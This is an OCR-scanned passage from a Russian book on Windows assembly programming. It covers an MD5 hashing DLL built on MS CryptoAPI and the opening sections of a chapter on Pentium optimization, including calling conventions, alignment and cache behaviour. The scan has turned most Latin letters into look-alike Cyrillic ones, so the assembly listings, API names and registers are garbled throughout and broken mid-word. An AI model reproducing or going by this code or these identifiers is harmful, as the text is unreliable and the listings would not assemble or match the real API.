ад а1,"0" 
По Буге рег [е91],а1 
„ЕЪЗЕ 
з1Б а1,10 
ада а1,"А" 
ПоУ Бузе рег [е41],а1 
„ЕМОТЕ 
пс ед! 
1пс ез1 
дес есх 
сир есх,0 
3072 хх 
ме Буфе рег [е91],0 
Хог еах, еах 
ге 


ВугетобЕк ЕМОР 


Епа 211Еплёху 
мзсар1е.ЧеЕ 


Ь]ВВАБКУ 
ЕХРОВТ$ 


мзсар1 
ТезеРилсе 1 01 


Целью М$ Сгурю АРГ является предоставить разработчику программ универсальный 
способ для использования криптографических модулей, поэтому интерфейс не ограничев 
какими-либо конкретными алгоритмами. Выбор конкретного алгоритма задается парамет- 
рами функций и зависит от используемого криптопровайдера. Перечислим основные зада- 
чи, решаемые с помощью крипторафического АРТ \/пдо\з: шифрование и расшифровка 
данных, выработка и проверка цифровой подписи (контрольной суммы), средства работы 
с цифровыми сертификатами, кодирование и декодирование данных, выработка и хранение 
криптографических ключей. . 

Порядок взаимодействия приложений с криптографическими модулями операционной 
системы регламентирует документ, который называется М1сгозой Сгурю2тарыс Арр|Исайой 
Ргоргапиитие Ниеасе (М$ Сгурю АРГ). Функции, описанные в нем, поддерживаются 
\паом5 95/98, УЛадо\з МТ, 2000, ХР. В последней ОС функции Сгурю АРТ содержатся 
в модулях сгур32.АП и афуар!32.9Й. На самом деле эти модули не реализуют криптографи 
ческие алгоритмы, а обращаются к другим модулям, называемым Сгурюзтарьс Зег\ее 
Ргоу14егз (СЗР). Одновременно в операционной системе можно установить несколько СЗР. 
При первом обращении к Сгурю АР! прикладная программа выбирает, с каким именно 
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‚олулем СЗР она будет работать, в зависимости от того, какие криптографические алго 
ы итмы ей необходимы. 

эффективность криптозащиты зависит не только от использования определенных меха 
низмов (криптопротоколов), таких, как шифрование или цифровая подпись, но и от выборе 
конкретных алгоритмов (криптопримитивов), реализуемых конкретным С$Р. Список всех 
С5Р (криптопровайдеров), установленных в \Мт4о\з 2000, можно получить в разделе 

У ГОСАЬ_МАСШМЕЗОРТ\УАВЕ\ Мегозой\Сгурюзтарву\Реви\Ргоуег системногс 
естра Ул 4о\5. 

Большинство протоколов защиты данных требует использования конкретных крипто- 
алгоритмов. Для того чтобы прикладные программы соответствовали общепринятым 
стандартам, Сгурю АРГ вводит специальные типы СЗР, например РКОУ В$А_ЕИЛ,. иль 
РКОУ_В5ЗА_ЗСНАММЕГ. Криптопровайдер указанного типа должен реализовывать все 
криптоалгоритмы, определенные соответствующим стандартом. Так, к примеру 
РЕОУ_КЗА_5СНАММЕ!, используется для реализации протокола $51, и должен поддер- 
живать алгоритм КЗА для цифровой подписи и обмена ключами, алгоритмы хеширова: 
ния ЗНА и МЬ5 и специальную функцию САГС_$$1.3_ЗНАМЬ5 ит. д. 

Наша библиотека тзсарй.ЧИ организовывает простой интерфейс к М$ Сгурю АР! 
а точнее, к его средствам хеширования МО5. Рассмотрим текст функции Тез ЕиисНоп. 


ТезРипсНоп ргос и3ез ез1 еф! 1рзише:РАМОВО 


ЬОСАБ ВСгурЕРгоу: НСВУРТРВОУ ; описатель криптопровайдера 
ЬОСАТ ПНаз: НСКУРТНАЗН ; описатель объекта хеширования 
ТОСАЬ ЗиБепдев ; БИОВО ; длина входной строки 


ТОСАЬ зНазв [512]: ВУТЕ ; массив контрольной СУМмЬ 
(хеш-образа) 


1пуоке СтурЕАсаи1гесопеехЕ, АБО 
ВСгурЕРЕох, МОБЬ, МОЪЬ, РВОУ _В$А_РОБЬ, СВУРТ УЕВТРУСОМТЕХТ 


„ТЕ еах== 
Эпр еггог 
.ВЫЗЕ 


1пуоке СгурсСтеаееНазй, ПСтурЕРхоу, САЬС М5, 0,0, АБРВ ПНазь 


.1Е еах== 
пр екгог 
„РЬбЕ 
1пуоке 156 :1еп, 1рзёг1 19 
моу диГепчЕВ , еах 
1пуоке СгурЕНазПБака, ННазь, 1 рзЕг1пд,амЬелчЕн, 0 


.1Е еах== 
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Эпр еггогк 


.ВЬЗЕ 
МОУ ЗиьепаЕв, $Т2ЕОЕ зНазй 
1пуоке 
СгурЕбеЕНазвРагам, ПНазй, НР_НАЗНУАЬ, АООВ зНазь, АГ-. 
Зитепдаев, 0 


.1Е еах== 
юр еггог 


.ЕЪЗЕ 
1пуоке ВусеТо$е т, диБепаеН , АВК 
зНазй, 1рзег1п9 ;сопуегЕ руке аггау Ко пех $6119 


1пуоке Стур(резехоуНазН, ННазь 
хог еах, еах 
пр ех1 Е 


.ЕМОТЕ 
.ЕМОТЕ 


1 пуске СгурЕВе] еазеСопкехЕ, ВСхурЕРхоу, 0 


.ЕМОТЕ 
„ЕМРТЕ 
ехгог: 
1пуоКе беефазЕЕтког 
1пуоке 01 зр1ауЕгког, еах 
ОУ . еах, -1 
ех1 с: 
тее 


ТезЕГипсЕ1оп епар 


21зр1ауЕтгог РВОС Егкох1О: РИОВО 


Директива ГОСАГ, резервирует память в стеке для локальных переменных и 
Все директивы ГОСАГ, должны следовать непосредственно за директивой РКОС. ри 
щение к локальным переменным в тексте программы происходит без каких бы то ни 
ло команд манипулирования стеком. . я С М8 СУ 

Вызов Сгур{АсаииеСощех! требуется любой программе, работающей с ера 
АРТ, именно этой функцией пользователь задает имя используемого криптопрова 
его тип и имя рабочего ключевого контейнера. Функция Сгур{АсаитеСотех возвра , 
описатель криптопровайдера, который в дальнейшем может быть использован при р 
те его функционалом. 
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СтурАсан1теСопеехЕ ргобо ПрРгоу: БИОВЬ, / 
р52Сопфа1пег: БМОВЬ, / 
рз2Ргоу1 вех: ОИОВЬ, / 
ЧиРгоуТуре: БИО, / 
ЗиЕ1адз: РИОКО 


ВрРгоу - указатель на описатель криптопровайдера. - 
рз2Сопба1пехк - имя контейнера ключей. 

рз2РГОУ1Чег - имя криптопровайдера. 

ЗиРГОоУТуре - тип запрашиваемого криптопровайдера. 
ЧиГ1а95 - дополнительные флаги. 


Для инициализации операции хэширования потока данных нам потребуется вызов 
гур*СтеаееНазВ, который создаст новый объект хэш-функции и вернет его описатель. 


СтурСгеаКеНазй ргобо ВРгоу:РМОВО, / 
А1919: БИОВО, / 
ВКеу: БИОВО, / 
Зиг1ааз: РИОВО, 
рпНазН: РИОКО 


БрРгоу - описатель криптопровайдера. 
А1914 - идентификатор используемого алгоритма хэширования. 


ПКеу - описатель сессионного ключа, используется в алгоритмах 
«хэширования с секретным ключом. 

ЗиР1адз - зарезервирован для дальнейшего использования 

рЬНазй - адрес переменной, в которую возвращается описатель но- 


эго объекта хэш-функции. 


Следующей операцией, выполняемой функцией Тез ЕипсНоп, является вычисление 
значения контрольной суммы (хэша) переданной строки — вызов СгурНазВРав. Он ис- 
пользуется для добавления данных к объекту хэш-функции. Многократный вызов функ- 


ции Сгур{НазпРайа позволяет вычисление значения хэша для последовательностей, раз- 
битых на блоки. 


СхурЕНази Рака ргосо пНазн:Б\ОвЬ, / 
рЬраба: ПИОВО, / 
дирасаЪеп;: О\ОВО, / 
ЗиЕ1ааз: РМОВО, 


ВНазЬ - описатель объекта хэп-функции. 
РЬрабса - буфер, содержащий хэшируемые данные, 
ЧирасаЁБеп - размер хэшируемых данных в байтах. 


ЗиР1ааз - флаги. | 
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Следующая задача — получить результат работы криптоалгоритма. И эту операц, 
для операций хэширования выполняет вызов Сгурбе{НазНРагат, возвращающий пара. 
метры объекта хэш-функции. 


СгурЕбесНазПРагам ргобо ВНазв:ОМОВО, / 
дЗиРахам: Б\МОВЬ, / 
рЬБаба: Риово, / 
рЬрабаЁБеп: Р\ОВЬ, 
ЗимЕ1ааз: О\ЧОВО, 


|НазН - описатель объекта хэш-функции. 
ЗиРагаю - тип получаемой информации, результат хэпирования и 
список поддерживаемых алгоритмов. 
рЬраёа - буфер для запрашиваемых данных. 
4ирасафеп - указатель на размер буфера данных в байтах. 
ЗиР1ааз - флаги. 
Для корректного завершения работы с криптопровайдером необходимо разрушить 
объект хэш-функции и освободить описаталь криптопровайдера. Это, соответственно, 
реализуют вызовы СгурезгоуНазВ и СгурВееазеСощехе. 


СгурЕБезегоуНазй рхкобко ННазп: ИОВ 


Функция уничтожает объект хэш-функции, определенный описателем БНа$Ь, после 
уничтожения его описатель становится недействительным. 


СтуререзегоуНазй ргофо ВРгоу:ОИОВЬ, / 


ЗчЕ1ааз: ОМОДКЬ 


Эта функция освобождает описатель криптопровайдера ВРгоу, созданный вызовом 
СгурАсаииеСотехе. Параметр 4\Е1арз зарезервирован для использования в будущем. 
Полученное значение контрольной суммы в функции ТезЕипсНой дополнительно 
конвертируется в символьную строку шестнадцатеричного дампа для удобного отобра- 
жения на экране. 
В заключение еще раз перечислим круг вопросов, обсуждавшихся на протяжении 
данной главы: 
м предпосылки к выбору инструментария разработки программ на языке ассемблер для 
ОС \!1190\5; . 


№ структура приложения ОС \//т4о\з на языке ассемблер; 


\ механизмы взаимодействия приложения с системными сервисами ОС \/п4о\ на 
ассемблере; 


разработка динамически загружаемых библиотек на языке ассемблер для \!!40\5; 


и криптографические средства ОС \/шдо\$ и их использование в программах на языке 
ассемблере. : 





Глава 6 
Оптимизация для процессоров 
семейства Репйит 


6.1. Введение 


В этой главе подробно рассказывается о том, как писать оптимизированный код 
на ассемблере для семейства микропроцессоров [| РепНит. В табл. 6.1 приводятся 
аббревиатуры, используемые в тексте для ссылки на то или иное поколение процессоров 
Репнит, подчеркивая его уникальные особенности: | 


Табл, 6.1. Основные поколения семейства процессоров \е! Репйит 


Аббревиатура Семейство 

Р1 Репйит 

РММХ Репйит с ММХ, 

РРго РепНит Рго 

ре Репйит П (включая Се|егоп и Хеоп) 
РЗ Репйит 1 (включая Сеегоп и Хеоп) 


Поколение микропроцессоров Р1 и РММХ, в отличие от остальных более поздних, 
имеет много уникальных особенностей оптимизации часто используемых операций и их 
комбинаций. Поэтому можно сказать, что не существует общих методик оптимизации 
для всех поколений. 

Нравила оптимизации кода весьма сложны и имеют много исключений, но возмож- 
ный выигрыш в производительности весьма значителен. У процесоров РРго, Р2 и РЗ 
также существуют значительные отличия внутренней реализации архитертуры Х86 
втом, как процессор оптимизирует исполнение потока инструкций, не говоря уже про 
постоянное расширение их набора. 

Современное поколение микропроцессоров РепНит 4 наиболее значительно отлича- 
ется от предыдущих поколений своей внутренней реализацией. По этому обсуждение 
приемов оптимизации для него — отдельная тема исследования и в данной главе будет 
опущена -- читатель может обратиться к соответствующим руководствам от ше]. 

Прежде чем начать реализовывать на некотором языке программирования решение 
поставленной задачи, следует убедиться, что используемый в нем алгоритм оптимален. Зачас- 
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тую можно сделать гораздо более эффективую его реализацию путем оптимизации алгорит. 
ма, чем привлечением всех возможных средств оптимизации к никудышнему алгоритму. 

Затем следует выделить критические участки кода. Зачастую, более чем 99% времени 
процессора тратится на исполнение внутреннего цикла программы. В этом случае нужно 
провести оптимизацию на ассемблере только этого цикла, а остальную часть программы 
оставить на языке высокого уровня. Некоторые программисты тратят огромное количество 
сил на оптимизацию на языке ассемблер некритичных участков кода своей программы, 
иединственным значительным результатом этого становятся дополнительные трудности 
в ее дальнейшей разработке и поддержке по причине сложности программного кода. 

Если не совсем понятно, какие части программы являются критическими, можно 
привлечь специальный инструментарий, способный провести анализ временных затрат 
на исполнение алгоритма и указать на критичные участки кода (большинство современ- 
ных сред разработки на языках высокого уровня обладают подобным инструментарием — 
так называемыми профайлерами). Если выясняется, что узким местом является доступ 
к диску, следует модифицировать алгоритм так, чтобы сделать доступ к диску последо- 
вательным (для повышения эффективности использования дискового), а не переклю- 
чаться на ассемблерное программирование. Если узким местом является вывод графики, 
можно поискать путь к уменьшению числа вызовов графических процедур. 

Некоторые современные высокоуровневые компиляторы осуществляют относительно 
хорошую оптимизацию результирующего кода для конкретных поколений микропроцес- 
соров, но дальнейшая "ручная" оптимизация обычно дает более ощутимые результаты. 


6.2. Дополнительные источники 


Множество полезной литературы и описаний можно бесплатно скачать с сайта 141 
БЕр://Лмуии.иие].сот или там же заказать их на СР-КОМ. Для дальнейшего изучения 
методов оптимизации желательно познакомиться с этой литературой для получения 
представления об архитектуре микропроцессоров. Найти нужные документы можно, 
используя функцию поиска на сайте ВИр://4еуеорег.ние!.сот или перейдя по одной из 
ссылок, которые находятся на БЁр://\\\м\.азпег.отр/аззет . 

Некоторые документы храняться в формате РОЕ. Если у вас нет программного обес- 
печения для просмотра и распечатки файлов РОГ, можно скачать бесплатный просмотр- 
щик файлов РОР — АсгоБа( Веадег с у\м\.адоБе.сот. 

Утилита УТОМЕ от Ши! предназначена для оптимизации кода. Ее также можно найти 
в системе поиска на сайтах пе]. 

Кроме | существует множество другой полезной информации. Эти источники 


перечислены в ЕАО группы новостей сотр.1апе.азт.х86. Также следует обратить внима- 
ние на ссылки, приведенные на \/\/№.аслег.оге/аззет. 





Глава 6. Оптимизация для процессоров семейства Репйит 359 


ока н ово ООО СВ Оооо Ооо воров о ооо во нае нии о сия в вое иван ори воть в иво в в в воре а виа сн вечен вавьь со 


6.3. Вызов ассемблерных функций 
из языков высокого уровня 


В большинстве современных сред разработки на языках высокого уровня доступно 
использование встроенного ассемблера или, по крайней мере, линковка с процедурами, 
не написанными на нем. Также большинство компиляторов обладают способностью 
промежуточной трансляции с языка высокого уровня в ассемблерный код. Использова- 
ние этой возможности предоставляет способ получения информации о семантике вызова 
функций и работе с данными программы на языке ассемблер, а также, естественно, путь 
кее оптимизации. 

Методы вызова функций и способы их именования могут быть достаточно сложны- 
ми. Существует много различных соглашений о вызовах функций, и многие компилято- 
ры не совместимы друг с другом в этом отношении. Если требуется вызов ассемблерной 
процедуры, например из С++, самым логичным будет ее объявляление как ежегт "С" 
и_с4ес!. К имени ассемблерной функции нужно прибавить символ подчеркивания 
и компилировать ее следует, указав в опциях требование чувствительности к регистру 
в именах функций и переменных. 

Если нужно использовать перегружаемые функции, перегружаемые операторы, 
функции-члены классов и другие расширения С++, тогда следует сначала написать код, 
например на С++, и с помощью компилятора перевести его в ассемблер, чтобы получить 
верную информацию о линковке и методе вызова. Вот пример перегруженной функции 
вычисления квадратного корня. 


} 116 зацате (116 х); 
ЗООЧАВЕ_Т РВОС МЕАК 
квадратного корня 


; целочисленная функция вычисления 


5ацаге$ч1 ГАВЕБ МЕАК ; имя, создаваемое компилятором Вог]1ап@ 
?з4цаге@ В УАНН@7 ГАВЕЪ МЕАВ ; имя, создаваемое компилятором 
М стозоЕЕ 
_зЧцахе__Р1 ТАВЕБ МЕАК ; имя, создаваемое компилятором Спи 
РОВЬТС @зацахе$а1, ?зацаге@ УАНН@?, _зчиаге__Р1 

МОУ БАХ, [Е5Р+4] 

ТМОЬ БАХ 

ВЕТ 


ЗОПАВЕ_Т ЕМОР 


}; Чоцр]е зацаге (дойЬ1е х}; 
ЗОПАВЕ_Р РВОС МЕАВ ; функция вычисления квадратного корня 
С двойной точностью 


@зчиагез ая ТАВЕЬ МЕАК ; имя, создаваемое компилятором Вог1\ап@ 
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?запаге 8УАММ@7 ТАВЕЬГ МЕАК 
М1 СГозоЕЕ 


_запаге__Ра БАВЕБЬ МЕАК ; имя, создаваемое компилятором бпи 
РОВЬЕС @зацаге$ аа, ?зачаге 8 @УАММ@ 7, запаге_ Ра 


; имя, создаваемое компилятором 


ЕРр = ОМОВО РТВ [ЕЗР+4] 
ЕМОЬ $1(0), 5т(0) 
ВЕТ 


ЗОЦАВЕ _Р ЕМОР 


Способ передачи параметров зависит от используемого соглашения о вызове подпро- 
граммы. В табл. 6.2 приводятся наиболее распространенные соглашения о вызовах 
функций, подробное их обсуждение велось в гл. 5 данной книги: 


Табл. 6.2. Соглашения о вызовах функций 


порядок помещения 
параметров в стек 


Кроме соглашения на вызов функции, в каждой ОС существуют правила использова- 
ния регистров. Приведем, в качестве примера, правила использования регистров процес- 
сора при вызове подпрограмм на языке ассемблера в системах семейства ОС \М4о\. 

Использование регистров в 16-битном режиме \Ут4о\5 для С или С++: 16-битное 
значение возвращается в АХ, 32-битное значение — в ОХ:АХ, значение с плавающей 
запятой — в $Т(0). Регистры АХ, ВХ, СХ, ОХ, ЕЗ и арифметические флаги могут быть 
изменены процедурой; другие регистры должны быть сохранены и восстановлены. 
Процедура должна полагаться на то, что при вызове другой процедуры значение 51, О 
ВР, 0$ и $5 не изменится. 

Использование регистров в 32-битном режиме \/ т 4о\5$, С++ и других языках программи- 

рования: целочисленное значение возвращается в ЕАХ, значение с плавающей точкой воз- 
вращается в $Т(0). Регистры ЕАХ, ЕСХ, ЕБХ (но не ЕВХ) могут быть изменены процедурой; 
все другие регистры должны быть сохранены и восстановлены. Сегментные регистры нельзя 
изменять даже временно. С$, 25$, Е$ и $5 указывают на плоский сегмент. Е$ используется 
операционной системой. С$ не используется, но зарезервирован на будущее. Флаги могут 
меняться процедурой, но со следующими ограничениями: флаг направления равен 0 по умол- 
чанию. Его можно изменить временно, но при выходе из процедуры необходимо очистить. 
Флаг прерывания не может быть очищен. Стек математического сопроцессора пуст при входе 
в процедуру и должен быть пустым при выходе, если только 5Т(0) не используется для во3- 
вращения значения. Регистры ММХ можно изменять, и, если это было сделано, их нужно 
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очистить с помощью инструкции ЕММб перед возврашением или вызовом любой другой 
пропедуры, которая может их использовать. Все ХММ регистры можно свободно изменять. 
Правила для передачи параметров и возвращения значений через регистры ХММ объяснены 
в документе [пе] АР 589. Процедура может полагаться на неизменность ЕВХ, ЕЗ1, ЕРЬ ЕВР 
и всех сегментных регистров при вызове другой пропедуры. 


6.4. Отладка 


Отладка ассемблерного кода — довольно трудоемкий и неприятный процесс. Перед раз- 
работкой оптимизированной процедуры на ассемблере, реализующей некоторый алгоритм, 
желательно сначала написать ее как подпрограмму на языке высокого уровня. Затем с по- 
мощью тестовой программы опять же на языке высокого уровня производится отладка 
самого алгоритма на предмет удовлетворения всем условиям ветвления и выравнивания. 

После этого осуществляется перевод задачи на язык ассемблера. 

Теперь можно начинать оптимизацию. Каждый раз, когда будут вноситься изменения 
в разрабатываемый код, можно осуществлять запуск тестовой программы, чтобы убе- 
диться, что она работает. Нумеруйте все промежуточные версии и сохраняйте их отдель- 
но, чтобы в случае ошибки можно было вернуться к одной из рабочих версий. 

Замерьте скорость наиболее критичных участков кода программы с помощью метода, 
изложенного в разд. 6.30. или с помощью тестовой программы. Если код значительно 
медленнее, чем ожидалось, возможны следующие проблемы: . 

в неправильно используется кэш (разд. 6.7); ‘ 
в невыравненны операнды (разд. 6.6); 

в цена первого запуска (разд. 6.8); 

в неправильное предсказание переходов (разд. 6.22); 

и проблемы загрузки кода (разд. 6.15); 

в потери скорости при чтении регистра (разд. 6.16); 

№ долгая цепь зависимости (разд. 6.20). 


6.5. Модель памяти 


Процессоры семейства Репйит спроектированны в основном для работы в 32-битном 
режиме, и, соответственно, при использовании 16-битного кода их производительность 
существенно снижается. Сегментирование кода и данных также значительно отражается 
на производительности, поэтому по возможности следует использовать 32-битный пло- 
ский режим и операционную систему, которая его поддерживает. Примеры, приводимые 
в данном руководстве, если иное не оговорено, рассчитаны именно на этот режим рабо- 
ты процессоров. 
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6.6. Выравнивание 


Для получения максимальной производительности все данные в оперативной памяти 
должны быть выравненены так, чтобы их адреса были кратны 2, 4, 8 или 16, согласно 
информации, приведенной в табл. 6.3. 


Табл. 6.3. Рекомендуемые границы выравнивания данных для различных поколениб 
семейства микропроцессоров [ме 






Размер операнда Выравнивание на границу (в байтах) 
(в байтах) 
Поколение Р1 и РММХ Поколение РРго, Р2 и РЗ 
1 (уе) 1 
р нок 2 
4 (@нога) 4 
6 (нога) 4 
Во [8 
О ОО ОИ ИЕ 
бонг 16 


На процессорах Р1 и РММХ при обращении к невыравненным данным теряется. 
по меньшей мере, 3 такта при пересечении границы в 4 байта. Потери, естественнс. 
будут ощутимее при пересечении границы кэша (разд. 6.7). 

На РРго, Р2 и РЗ невыравненные данные будут стоить 6 — 12 дополнительных тактог. 
в случае выхода за граница кэша. Невыравненные операнды, размер которых не превы- 
шает 16 байтов и не перешедшие границу в 32 байта, не приводят к потерям. 

Выравнивание данных на 8- или 16- байтовую границу в стеке двойных слов может 
стать проблемой. Общий метод решения — установить выравненный указатель на кадр 
стека. Функция с выравненными локальными данными может выглядеть примерно так: 


_Рапси1ЕНА1191 РКОС МЕАК 
РОЗН ЕВР 


; пролог 

МОУ ‚ ЕВР, ЕР 

АМО ЕВР, -8 ; выравнивание указателя на 
кадр 
у : стека на 8 

РЬО ВНОВЬ РТВ [ЕЗР+8] ; параметр функции 

ЗОВ ЕЗР, Госа15расе + 4 ; резервируем локальные данные 


№0 _ 
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ЕОТР ОИОВО РТВ [ЕВР-Ьоса]5расе] ; теперь сохраняем что-нибудь в 
; локальной переменной 


АБО ЕЗР, Боса]15расе + 4 ; эпилог, восстанавливаем ЕЗР 


РОР ЕВР 
ВЕТ 
Еорси1С1А1191 ЕМОР 


; (потеря скорости АСТ на Р1/РММХ) 


В то время как выравнивание данных играет ощутимую роль в достижении макси- 
мальной производительности, выравнивание кода не является обязательным для Р1 
и РММХ. Принципы выравнивания кода на РРго, Р2 и РЗ изложены в разд. 6.15. 


6.7. Кэш 


УР! и РРго 8 килобайт кэш первого уровня для кода и 8 килобайт для данных. 
УРММХ, Р2 и РЗ по 16 килобайт для кода и данных соотвественно. Данные в кэше пер- 
вого уровня можно читать или перезаписывать за один такт, в то время как выход за его 
границы может стоить множества тактов. Поэтому важно понимать, как работает кэш, 
чтобы использовать его наиболее эффективно. 

Кэш данных состоит из 256 или 512 рядов по 32 байта в каждом. Каждый раз, когда 
считывается элемент данных из памяти, который еще не находится в кэше, процессор 
заполняет весь кэш-ряд. Кэш-ряды всегда выравниваются по физическому адресу, крат- 
ному 32. Когда происходит обращение к байту по адресу, который кратен 32, чтение или 
запись в следующие за ним 31 байт не будет стоить практически ничего. Это можно 
выгодно использовать, организовав данные, которые используются вместе, в блоки по 32 
байта. Если, например, есть цикл, в котором обрабатываются два массива, можно их пе- 
регруппировать в один массив структур, чтобы данные, которые используются вместе. 
находились в памяти рядом друг с другом. 

Если размер массива кратен 32 байтам, следует и выровнять его по границе 32 байт. 

Кэш пропессоров семейства Реп ит зе{-ассоциативен. Это означает, что кэш-ряд нельзя 
ассоциировать с произвольным адресом памяти. У каждого кэш-ряда есть 7-битное значе: 
ние, которое задает биты 5 — 11 адреса в физической памяти (биты 0-4 определяются по- 
ложением элемента данных в кэш-ряду). У Р1 и РРго два кэш-ряда для каждого из 128 воз: 
можных 56{-значений, поэтому с определенным адресом в памяти можно ассоциировате 
Только два жестко заданных кэш-ряда. В РММХ, Р2 иР3З - четыре. 

Следствием этого является то, что кэш может содержать не более двух или четыре» 
различных блока данных, у которых совпадают биты 5 — 11 их адресов. Существует воз 
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можность определить, совпадают ли эти биты у двух адресов следующим образом: ле 
дует удалить нижние пять битов каждого адреса, чтобы получить значение, кратное р 
Если разница между этими обрезанными значениями кратна 4096 (10001), значит, у этих 
адресов одно и то же 5е-значение. | 


Проиллюстрируем вышеизложенное с помощью следующего кода, где Е$] содержит 
адрес, кратный 32. 


АСАТМ:; МОУ БАХ, [Е5Т} 
МОУ ЕВХ, [ЕЗТГ + 13*4096 + - 4} 
МОУ ЕСХ, [ЕЗГ + 20*4096 + 23] 
ВЕС ЕОХ 
№2  АСАТМ 


У всех трех адресов, использованных здесь, совпадают зе{-значения, потому что раз- 
ница между обрезанными адресами будет кратна 4096. Этот цикл будет очень плохо 
выполняться на Р1 и РРго. Во время записи в ЕСХ нет ни одного свободного кэш-ряда, 
поэтому тот. который был использован для значения, помещенного в ЕАХ, заполняется 
данными с [Е$1[+20*4096] до [Е$1+20*4096+31] и записывает значение в ЕСХ. Затем во 
время чтения ЕАХ оказывается, что кэш-ряд, содержавший значение для ЕАХ, уже из- 
менен, поэтому то же самое происходит с кэш-рядом, содержащим значение для ЕВХ, 
ит. д. Это пример нерационального использования кэша: цикл занимает около 60 тактов. 
Если третью линию изменить на: 


МОУ ЕСХ, [ЕЗТГ + 20*4096 + 32], 


мы пересечем границу в 32 байта и у нас будет другое зеё значение, а следовательно, не воз- 
никнет никаких проблем с ассоциированием кэш-рядов к этим трем адресам. Цикл теперь 
занимает 3 такта (не считая первого раза) — весьма значительное улучшение! Стоит упомя- 
нуть, что у РММХ, Р2 и Р3 для каждого зе-значения есть четыре кэш-ряда. (Некоторые доку- 
менты ще! ошибочно утверждают, что у Р2 по два кэш-ряда на каждое зезначение). 

Определить, одинаковые ли у переменных зезначения, может оказаться достаточно 
сложным, особенно, если они разбросаны по различным сегментам. Лучшее, что можно 
придумать для избежания проблем подобного рода, — это держать все данные, исполь- 
зуемые в критической части программы, внутри одного блока, который будет не больше, 
чем кэш, либо в двух блоках, не больших, чем половина от его размера (например, один 
блок для статических данных, а другой для данных в стеке). Это будет гарантией того, 
что кэш-ряды используются оптимальным образом. 

Если критическая часть кода имеет дело с большими структурами данных или дан- 
ными, располагающимися в памяти случайным образом, стоит подумать о том, чтобы 
держать наиболее часто используемые переменные (счетчики, указатели, флаговые пе- 
ременные ит. д.) в одном блоке с максимальным размером в 4 килобайта, чтобы исполь- 
зовались все кэш-ряды. Так как еще требуется стек для хранения параметров подпро- 
граммы и возвращаемых адресов, лучшее, что можно сделать, - это скопировать 
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наиболее часто используемые статические данные в динамические переменные в стеке, 
в после выхода из критической части кода скопировать обратно те из них, которые под- 
верглись изменению. | 

Чтение элемента данных, которого нет в кэше первого уровня, приводит к тому, что 
весь кэш-ряд будет заполнен из кэша второго уровня. Если его нет ив кэше второго 

ровня, то результатом этого будет большая задержка, которая может оказаться совсем 
гигантской, в случае пересечения границы страниц. 

При считывании больших блоков данных из памяти скорость ограничивается време- 
нем, уходящим на заполнение кэш-рядов. Иногда возможно ее увеличение за счет изме- 
нения последовательности считывания данных: еще не считав данные из одного кэш- 
ряда, начать читать первый элемент из следующего кэш-ряда. Этот метод может повы- 
сить скорость на 20 — 40% при считывании данных из основной памяти, или кэша второ- 
го уровня на Р1 иРММХ, или из кэша второго уровня на РРго, Р2 иРЗ. Недостаток этого 
метода заключается в том, что код программы становится очень запутанным и сложным. 
Дополнительную информацию об этом методе можно получить с сайта 
ум. ииеШоепгт.сот. 

Когда происходит запись по адресу, которого нет в кэше первого уровня, наР1] 
и РММХ значение будет отправлено прямо в кэш второго уровня или в память (в зави- 
симости от того, как настроен кэш второго уровня). Это займет примерно 100 п$. Если 
пишется восемь или более раз в тот же 32-байтный блок памяти, ничего не читая из него, 
и блок не находится в кэше первого уровня, возможно, стоит сделать фальшивое чтение 
из него, чтобы он был загружен в кэш-ряд. Все последующие чтения будут производить- 
ся в кэш, что занимает всего лишь один такт. На Р1 и РММХ иногда происходит не- 
больная потеря в производительности при повторяющемся чтении по одному и тому же 
адресу без чтения из него между этим. 

На микропроцессорах поколений РРго, Р2 и РЗ запись обычно ведет к загрузке памяти 
в кэш-ряд, но возможно указать область памяти, с которой следует поступать иначе (см. 
"Репнит Рго ЕатИу Оеуеюрег$ Мапиа|, уо1. 3: Орегайпе Зу\ет \Мтиег$ Оше"). 

Другие пути увеличения скорости чтения и записи в память обсуждаются в разд. 6.27.8. 

УР! и РРго есть два буфера записи, у РММХ, Р2 и Р3 - четыре. На РММХ, Р2 и РЗ 
может быть до четырех незаконченных записей в некэшированную память без задержки 
последующих инструкций. Каждый буфер записи может обрабатывать операнды до 64 
бит длиной. 

Временные данные удобно хранить в стеке, потому что стековая область, как прави- 
ло, находится в кэше. Тем не менее, следует избегать проблем с выравниваем, если эле- 
менты данных больше, чем размер слова стека. 

Если время жизни двух структур данных не пересекается, они могут разделять одну 
иту же область памяти, чтобы повысить эффективность кэша. Это согласуется с общей 
практикой держать временные переменные в стеке. 
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Хранение временных данных в регистрах, разумеется, более эффективно. Вследствие 
того что регистров в микропроцессорах семейства РепНит мало, возможно, потребуется 
использование [ЕЗР] вместо [ЕВР] для адресации данных в стеке, чтобы освободить ЕВр 
для других целей. Однако не следует забывать, что значение ЕЗР меняется каждый раз, 
когда выполняются команды РОЗН или РОР, к тому же нельзя использовать ЕЗР в 16- 
битном режиме \Мт4о\з, потому что прерывания таймера будут менять верхнее слово 
[ЕЗР] стека совершенно непредсказуемо. | 

В процессорах семейства РепНит существует кэш кода, который по назначению схож 
с кэшем данных. Размер кэша кода равен 8 килобайтам на Р1 и РРго и 16 килобайтам на 
РММХ, Р2 и РЗ. Важно, чтобы критические части кода (внутренние циклы) полностью 
умещались в кэш кода. Часто используемые процедуры следует помещать рядом друг 
с другом. Редко используемые ветви или процедуры нужно держать в "самом низу" раз- 
дела исполняемого кода. 


6.8. Исполнение кода "в первый раз" 


Обычно исполнение кода в первый раз занимает намного болыше времени, чем при 
последующих повторениях в силу следующих причин: 


Ш загрузка кода из КАМ в кэш занимает намного больше времени, чем его выполнение; 


Ш любые данные, к которым обращается КОД, ДОЛЖНЫ быть загружены в кэш, что также 
занимает много времени, в случае повторного выполнения данные, как правило, уже 
находятся в кэше; 

М любая инструкция передачи управления не находится в буфере предсказывания пере- 
ХОДОВ В первый раз, поэтому маловероятно, что она будет предсказана правильно 
(см. разд. 6.22); 


Ш наР1 декодирование инструкций является узким местом. 


Если определение длины инструкции занимает один такт, то процессор не может рас- 
кодировать за такт две инструкции, так как он не знает, где начинается вторая инструк- 
ция. Р1 решает эту проблему, запоминая длину любой инструкции, которая осталась 
в кэше. Как следствие, ряд инструкций не спариваются на Р1 во время первого исполне- 
ния, если только первые две инструкции не занимают по одному байту. У РММХ, РРис. 
Р2 и РЗ таких потерь нет. 

В силу этих четырех причин код внутри цикла будет занимать больше времени на ис- 
полнение в первый раз, нежели в последующие. 

Если имеется большой цикл, который не помещается в кэш кода, это может стать слег ® 
ствием постоянных потерь производительности, потому что код будет исполняться, Н- 
используя преимуществ кэша. Следует реорганизовать цикл так, чтобы он умещался в кэш 
